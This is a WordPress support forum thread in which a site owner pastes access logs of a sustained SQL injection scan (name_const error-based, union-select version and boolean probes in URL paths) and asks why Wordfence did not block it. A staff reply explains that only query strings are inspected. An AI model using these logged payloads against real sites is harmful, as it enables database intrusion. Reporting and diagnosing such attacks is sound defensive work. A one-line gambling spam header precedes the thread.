Julie's bakeshop wikipedia philippines.Makakuha ng libreng 700pho sa bawat deposito

Resolved iulianh
(@iulianh)

5 years, 11 months ago

Hello,

why the Wordfence is not blocking the ip when someone is doing sql injection?
Here are logs from a website with Wordfence active and didn’t block the ip automatic!
I receive an email after long time that we have Increased Attack Rate but didn’t block the ip!
The sql injection attack from that ip went over 1000 times!

201.235.27.99 – – [09/Apr/2019:18:07:57 +0300] “GET /categorie-produs/ciorbe-supe-creme/%27%20or%20(1,2)=(select*from(select%20name_const(CHAR(98,77,83,83,101,77,112,84,109,65,97),1),name_const(CHAR(98,77,83,83,101,77,112,84,109,65,97),1))a)%20–%20%27x%27=%27x HTTP/1.0” 301 661 “-” “Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0”
201.235.27.99 – – [09/Apr/2019:18:07:57 +0300] “GET /categorie-produs/meniu-pentru-copii/%20or%20(1,2)=(select*from(select%20name_const(CHAR(118,77,104,72,118,120,116,109,72,115),1),name_const(CHAR(118,77,104,72,118,120,116,109,72,115),1))a)%20–%20and%201%3D1 HTTP/1.0” 301 661 “-” “Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0”
201.235.27.99 – – [09/Apr/2019:18:07:57 +0300] “GET /0%27%20or%20(1,2)=(select*from(select%20name_const(CHAR(110,89,74,76,82,73,89,112,71),1),name_const(CHAR(110,89,74,76,82,73,89,112,71),1))a)%20–%20%27x%27=%27x HTTP/1.0” 301 661 “-” “Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0”
201.235.27.99 – – [09/Apr/2019:18:07:57 +0300] “GET /despre-noi/%27%20or%20(1,2)=(select*from(select%20name_const(CHAR(85,107,83,87,81,99,83,114,73,105,66,86),1),name_const(CHAR(85,107,83,87,81,99,83,114,73,105,66,86),1))a)%20–%20%27x%27=%27x HTTP/1.0” 301 661 “-” “Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0”
201.235.27.99 – – [09/Apr/2019:18:07:57 +0300] “GET /localizare/%20or%20(1,2)=(select*from(select%20name_const(CHAR(106,65,67,109,104,83,113,111,85,75,86),1),name_const(CHAR(106,65,67,109,104,83,113,111,85,75,86),1))a)%20–%20and%201%3D1 HTTP/1.0” 301 661 “-” “Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0”
201.235.27.99 – – [09/Apr/2019:18:07:58 +0300] “GET / HTTP/1.0” 200 12545 “-” “Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0”
201.235.27.99 – – [09/Apr/2019:18:07:57 +0300] “GET /evenimente/%27%20or%20(1,2)=(select*from(select%20name_const(CHAR(76,65,121,119,106,82,108,69,76),1),name_const(CHAR(76,65,121,119,106,82,108,69,76),1))a)%20–%20%27x%27=%27x HTTP/1.0” 301 661 “-” “Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0”
201.235.27.99 – – [09/Apr/2019:18:07:57 +0300] “GET /sala-de-conferinte/%27%20or%20(1,2)=(select*from(select%20name_const(CHAR(105,121,87,103,85,98,86,122,87,81,77,69),1),name_const(CHAR(105,121,87,103,85,98,86,122,87,81,77,69),1))a)%20–%20%27x%27=%27x HTTP/1.0” 301 661 “-” “Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0”
201.235.27.99 – – [09/Apr/2019:18:07:58 +0300] “GET / HTTP/1.0” 200 12545 “-” “Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0”
201.235.27.99 – – [09/Apr/2019:18:07:58 +0300] “GET / HTTP/1.0” 200 12545 “-” “Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0”
201.235.27.99 – – [09/Apr/2019:18:07:58 +0300] “GET / HTTP/1.0” 200 12545 “-” “Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0”
201.235.27.99 – – [09/Apr/2019:18:07:57 +0300] “GET /categorie-produs/meniu-pentru-copii/?add-to-cart=2491\”%20and%20\”x\”%3D\”x HTTP/1.0” 200 11520 “-” “Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0”
201.235.27.99 – – [09/Apr/2019:18:07:58 +0300] “GET /salon-evenimente/%27%20or%20(1,2)=(select*from(select%20name_const(CHAR(119,90,85,99,100,122,80,106,115),1),name_const(CHAR(119,90,85,99,100,122,80,106,115),1))a)%20–%20%27x%27=%27x HTTP/1.0” 301 661 “-” “Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0”
201.235.27.99 – – [09/Apr/2019:18:07:58 +0300] “GET / HTTP/1.0” 200 12545 “-” “Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0”
201.235.27.99 – – [09/Apr/2019:18:07:58 +0300] “GET / HTTP/1.0” 200 12545 “-” “Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0”
201.235.27.99 – – [09/Apr/2019:18:07:58 +0300] “GET /rezervari/%27%20or%20(1,2)=(select*from(select%20name_const(CHAR(105,98,98,83,90,105,73,117,82,81,85,102),1),name_const(CHAR(105,98,98,83,90,105,73,117,82,81,85,102),1))a)%20–%20%27x%27=%27x HTTP/1.0” 301 661 “-” “Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0”
201.235.27.99 – – [09/Apr/2019:18:07:58 +0300] “GET / HTTP/1.0” 200 12545 “-” “Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0”
201.235.27.99 – – [09/Apr/2019:18:07:58 +0300] “GET /politica-confidentialitate/%27%20or%20(1,2)=(select*from(select%20name_const(CHAR(115,102,90,98,117,80,99,88,78),1),name_const(CHAR(115,102,90,98,117,80,99,88,78),1))a)%20–%20%27x%27=%27x HTTP/1.0” 301 661 “-” “Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0”
201.235.27.99 – – [09/Apr/2019:18:07:58 +0300] “GET /restaurant/%27%20or%20(1,2)=(select*from(select%20name_const(CHAR(70,74,74,110,108,84,112,114,108),1),name_const(CHAR(70,74,74,110,108,84,112,114,108),1))a)%20–%20%27x%27=%27x HTTP/1.0” 301 661 “-” “Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0”
201.235.27.99 – – [09/Apr/2019:18:07:58 +0300] “GET / HTTP/1.0” 200 12545 “-” “Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0”
201.235.27.99 – – [09/Apr/2019:18:07:58 +0300] “GET /cariere/%27%20or%20(1,2)=(select*from(select%20name_const(CHAR(70,105,111,66,88,65,79,109,110,99),1),name_const(CHAR(70,105,111,66,88,65,79,109,110,99),1))a)%20–%20%27x%27=%27x HTTP/1.0” 301 661 “-” “Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0”
201.235.27.99 – – [09/Apr/2019:18:07:58 +0300] “GET /contact/%27%20or%20(1,2)=(select*from(select%20name_const(CHAR(105,73,110,77,76,114,110,83,103),1),name_const(CHAR(105,73,110,77,76,114,110,83,103),1))a)%20–%20%27x%27=%27x HTTP/1.0” 301 661 “-” “Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0”
201.235.27.99 – – [09/Apr/2019:18:07:58 +0300] “GET /galerie-foto/99999%22%20union%20select%20unhex(hex(version()))%20–%20%22x%22=%22x HTTP/1.0” 301 661 “-” “Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0”
201.235.27.99 – – [09/Apr/2019:18:07:58 +0300] “GET / HTTP/1.0” 200 12545 “-” “Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0”
201.235.27.99 – – [09/Apr/2019:18:07:58 +0300] “GET /produs/ciorba-de-burta-400-80-g/\”%20and%20\”x\”%3D\”x HTTP/1.0” 301 661 “-” “Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0”
201.235.27.99 – – [09/Apr/2019:18:07:58 +0300] “GET / HTTP/1.0” 200 12545 “-” “Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0”
201.235.27.99 – – [09/Apr/2019:18:07:58 +0300] “GET /room/apartament/%27%20or%20(1,2)=(select*from(select%20name_const(CHAR(97,102,109,117,113,107,82,110,82,84,88),1),name_const(CHAR(97,102,109,117,113,107,82,110,82,84,88),1))a)%20–%20%27x%27=%27x HTTP/1.0” 301 661 “-” “Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0”
201.235.27.99 – – [09/Apr/2019:18:07:58 +0300] “GET /room/camera-single/%27%20or%20(1,2)=(select*from(select%20name_const(CHAR(88,109,113,89,114,80,115,68,69,122),1),name_const(CHAR(88,109,113,89,114,80,115,68,69,122),1))a)%20–%20%27x%27=%27x HTTP/1.0” 301 661 “-” “Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0”
201.235.27.99 – – [09/Apr/2019:18:07:58 +0300] “GET / HTTP/1.0” 200 12545 “-” “Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0”
201.235.27.99 – – [09/Apr/2019:18:07:58 +0300] “GET /cart/%27%20or%20(1,2)=(select*from(select%20name_const(CHAR(86,114,73,75,86,81,71,81,79,102),1),name_const(CHAR(86,114,73,75,86,81,71,81,79,102),1))a)%20–%20%27x%27=%27x HTTP/1.0” 301 661 “-” “Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0”
201.235.27.99 – – [09/Apr/2019:18:07:58 +0300] “GET / HTTP/1.0” 200 12545 “-” “Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0”
201.235.27.99 – – [09/Apr/2019:18:07:58 +0300] “GET /categorie-produs/ciorbe-supe-creme/?add-to-cart=2523\”%20and%20\”x\”%3D\”x HTTP/1.0” 200 11882 “-” “Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0”
201.235.27.99 – – [09/Apr/2019:18:07:58 +0300] “GET / HTTP/1.0” 200 12545 “-” “Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0”
201.235.27.99 – – [09/Apr/2019:18:07:58 +0300] “GET / HTTP/1.0” 200 12545 “-” “Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0”
201.235.27.99 – – [09/Apr/2019:18:07:58 +0300] “GET / HTTP/1.0” 200 12545 “-” “Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0”
201.235.27.99 – – [09/Apr/2019:18:07:58 +0300] “GET /contact/\”%20and%20\”x\”%3D\”x HTTP/1.0” 301 661 “-” “Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0”
201.235.27.99 – – [09/Apr/2019:18:07:59 +0300] “GET / HTTP/1.0” 200 12545 “-” “Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0”
201.235.27.99 – – [09/Apr/2019:18:07:58 +0300] “GET /categorie-produs/ciorbe-supe-creme/%22%20and%20%22x%22%3D%22y HTTP/1.0” 301 661 “-” “Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0”
201.235.27.99 – – [09/Apr/2019:18:07:58 +0300] “GET /por/index.html%27%20or%20(1,2)=(select*from(select%20name_const(CHAR(107,105,122,72,82,103,97,99,73,99,87),1),name_const(CHAR(107,105,122,72,82,103,97,99,73,99,87),1))a)%20–%20%27x%27=%27x HTTP/1.0” 301 490 “-” “Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0”
201.235.27.99 – – [09/Apr/2019:18:07:59 +0300] “GET / HTTP/1.0” 200 12545 “-” “Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0”
201.235.27.99 – – [09/Apr/2019:18:07:59 +0300] “GET / HTTP/1.0” 200 12545 “-” “Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0”
201.235.27.99 – – [09/Apr/2019:18:07:59 +0300] “GET / HTTP/1.0” 200 12545 “-” “Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0”
201.235.27.99 – – [09/Apr/2019:18:07:58 +0300] “GET /categorie-produs/gustari-antreuri/%27%20or%20(1,2)=(select*from(select%20name_const(CHAR(83,113,103,77,72,106,70,98,106,77,117,98),1),name_const(CHAR(83,113,103,77,72,106,70,98,106,77,117,98),1))a)%20–%20%27x%27=%27x HTTP/1.0” 301 661 “-” “Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0”
201.235.27.99 – – [09/Apr/2019:18:07:59 +0300] “GET /room/apartament/%22%20and%20%22x%22%3D%22y HTTP/1.0” 301 661 “-” “Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0”
201.235.27.99 – – [09/Apr/2019:18:07:59 +0300] “GET /%22%20or%20(1,2)=(select*from(select%20name_const(CHAR(114,108,73,66,104,74,81,80,114,111),1),name_const(CHAR(114,108,73,66,104,74,81,80,114,111),1))a)%20–%20%22x%22=%22x HTTP/1.0” 301 661 “-” “Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0”
201.235.27.99 – – [09/Apr/2019:18:07:59 +0300] “GET / HTTP/1.0” 200 12545 “-” “Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0”
201.235.27.99 – – [09/Apr/2019:18:07:59 +0300] “GET / HTTP/1.0” 200 12545 “-” “Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0”
201.235.27.99 – – [09/Apr/2019:18:07:59 +0300] “GET /event/live-06-08-iulie/%22%20and%20%22x%22%3D%22y HTTP/1.0” 301 661 “-” “Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0”
201.235.27.99 – – [09/Apr/2019:18:07:58 +0300] “GET /categorie-produs/gustari-antreuri/?add-to-cart=2708\”%20and%20\”x\”%3D\”x HTTP/1.0” 200 11597 “-” “Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0”
201.235.27.99 – – [09/Apr/2019:18:07:59 +0300] “GET /livrari/%27%20or%20(1,2)=(select*from(select%20name_const(CHAR(85,80,116,110,70,77,119,103,73),1),name_const(CHAR(85,80,116,110,70,77,119,103,73),1))a)%20–%20%27x%27=%27x HTTP/1.0” 301 661 “-” “Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0”
201.235.27.99 – – [09/Apr/2019:18:07:59 +0300] “GET / HTTP/1.0” 200 12545 “-” “Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0”
201.235.27.99 – – [09/Apr/2019:18:07:59 +0300] “GET / HTTP/1.0” 200 12545 “-” “Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0”
201.235.27.99 – – [09/Apr/2019:18:07:59 +0300] “GET / HTTP/1.0” 200 12545 “-” “Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0”
201.235.27.99 – – [09/Apr/2019:18:07:59 +0300] “GET /room/camera-dubla/%27%20or%20(1,2)=(select*from(select%20name_const(CHAR(78,107,105,103,87,100,66,73,75,101,86),1),name_const(CHAR(78,107,105,103,87,100,66,73,75,101,86),1))a)%20–%20%27x%27=%27x HTTP/1.0” 301 661 “-” “Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0”
201.235.27.99 – – [09/Apr/2019:18:07:59 +0300] “GET / HTTP/1.0” 200 12545 “-” “Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0”
201.235.27.99 – – [09/Apr/2019:18:07:59 +0300] “GET /categorie-produs/meniu-pentru-copii/%27%20or%20(1,2)=(select*from(select%20name_const(CHAR(118,77,104,72,118,120,116,109,72,115),1),name_const(CHAR(118,77,104,72,118,120,116,109,72,115),1))a)%20–%20%27x%27=%27x HTTP/1.0” 301 661 “-” “Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0”
201.235.27.99 – – [09/Apr/2019:18:07:59 +0300] “GET /categorie-produs/ciorbe-supe-creme/%22%20or%20(1,2)=(select*from(select%20name_const(CHAR(98,77,83,83,101,77,112,84,109,65,97),1),name_const(CHAR(98,77,83,83,101,77,112,84,109,65,97),1))a)%20–%20%22x%22=%22x HTTP/1.0” 301 661 “-” “Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0”
201.235.27.99 – – [09/Apr/2019:18:07:59 +0300] “GET /localizare/%27%20or%20(1,2)=(select*from(select%20name_const(CHAR(106,65,67,109,104,83,113,111,85,75,86),1),name_const(CHAR(106,65,67,109,104,83,113,111,85,75,86),1))a)%20–%20%27x%27=%27x HTTP/1.0” 301 661 “-” “Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0”
201.235.27.99 – – [09/Apr/2019:18:07:59 +0300] “GET /despre-noi/%22%20or%20(1,2)=(select*from(select%20name_const(CHAR(85,107,83,87,81,99,83,114,73,105,66,86),1),name_const(CHAR(85,107,83,87,81,99,83,114,73,105,66,86),1))a)%20–%20%22x%22=%22x HTTP/1.0” 301 661 “-” “Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0”
201.235.27.99 – – [09/Apr/2019:18:07:59 +0300] “GET /cazare/%22%20or%20(1,2)=(select*from(select%20name_const(CHAR(110,89,74,76,82,73,89,112,71),1),name_const(CHAR(110,89,74,76,82,73,89,112,71),1))a)%20–%20%22x%22=%22x HTTP/1.0” 301 661 “-” “Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0”
201.235.27.99 – – [09/Apr/2019:18:07:59 +0300] “GET /evenimente/%22%20or%20(1,2)=(select*from(select%20name_const(CHAR(76,65,121,119,106,82,108,69,76),1),name_const(CHAR(76,65,121,119,106,82,108,69,76),1))a)%20–%20%22x%22=%22x HTTP/1.0” 301 661 “-” “Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0”

Viewing 3 replies - 1 through 3 (of 3 total)

gore.m
(@gorem)

5 years, 11 months ago

Same here! Crazy…

wfdave
(@wfdave)

5 years, 10 months ago

Hi @iulianh and @gorem,

Wordfence does not catch SQL injections that are not submitted through a query parameter.

Looking at the URL in question, GET /categorie-produs/ciorbe-supe-creme/%27%20or%20(1,2)=(select*from(select%20name_const(CHAR(98,77,83,83,101,77,112,84,109,65,97),1),name_const(CHAR(98,77,83,83,101,77,112,84,109,65,97),1))a)%20–%20%27x%27=%27x is a the SQL injection occurs without ?something=***, it just has the SQL at the end of the URL.

Wordfence’s SQL injection protection is focused on looking at query strings, where custom plugins on your site might read and blindly execute on the database.

Dave

Thread Starter iulianh
(@iulianh)

5 years, 10 months ago

Hi,
@wfdave

Than is not doing the job good! Should protect all the URL! not only the ones with ?something=***

Thank you

Viewing 3 replies - 1 through 3 (of 3 total)

The topic ‘why the Wordfence is not blocking the ip when someone is doing sql injection?’ is closed to new replies.